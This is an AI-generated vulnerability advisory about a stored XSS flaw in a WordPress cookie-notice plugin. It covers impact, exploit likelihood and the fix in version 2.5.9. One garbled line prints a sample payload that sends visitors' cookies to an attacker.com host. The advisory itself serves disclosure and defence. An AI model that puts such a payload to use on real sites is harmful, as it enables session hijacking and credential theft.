
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67554 is a Stored Cross-Site Scripting (XSS) vulnerability in the "Cookie Notice & Compliance for GDPR / CCPA" WordPress plugin developed by Humanityco. It affects all plugin versions up to and including 2.5.8, and was reported by researcher Peter Thaleikis on September 21, 2025, with public disclosure on October 21, 2025. The vulnerability was assigned a CVSS v3.1 base score of 5.9 (Medium) (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the stored (persistent) variant. An attacker with Author or Developer-level privileges can inject malicious scripts into plugin settings or content fields that are subsequently stored in the database and rendered to site visitors without proper sanitization or output escaping. Exploitation requires user interaction from a privileged user (e.g., an administrator visiting a crafted page), and the vulnerability has a changed scope, meaning injected scripts can affect users in a different security context than the attacker's (Patchstack).
Successful exploitation allows a malicious actor to inject persistent JavaScript or HTML payloads into the WordPress site, which execute in the browsers of visiting users, including administrators. This can lead to session hijacking, credential theft, unauthorized redirects, defacement, or delivery of malicious advertisements to site visitors. The changed scope means the impact extends beyond the attacker's privilege level, potentially affecting all users who visit pages where the malicious content is rendered (Patchstack).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. Exploitation requires high privileges (Author/Developer role) and user interaction, which significantly limits the attack surface. Patchstack classifies this as low priority with no impactful threat currently observed, and it is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.wp_options table, particularly fields associated with the cookie-notice plugin containing <script> tags or encoded JavaScript.The vulnerability is patched in version 2.5.9 of the Cookie Notice & Compliance for GDPR / CCPA plugin. Site administrators should update the plugin to version 2.5.9 or later immediately via the WordPress admin dashboard. If an immediate update is not possible, restricting Author/Developer-level user accounts and reviewing plugin settings for unexpected script content are recommended interim measures. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."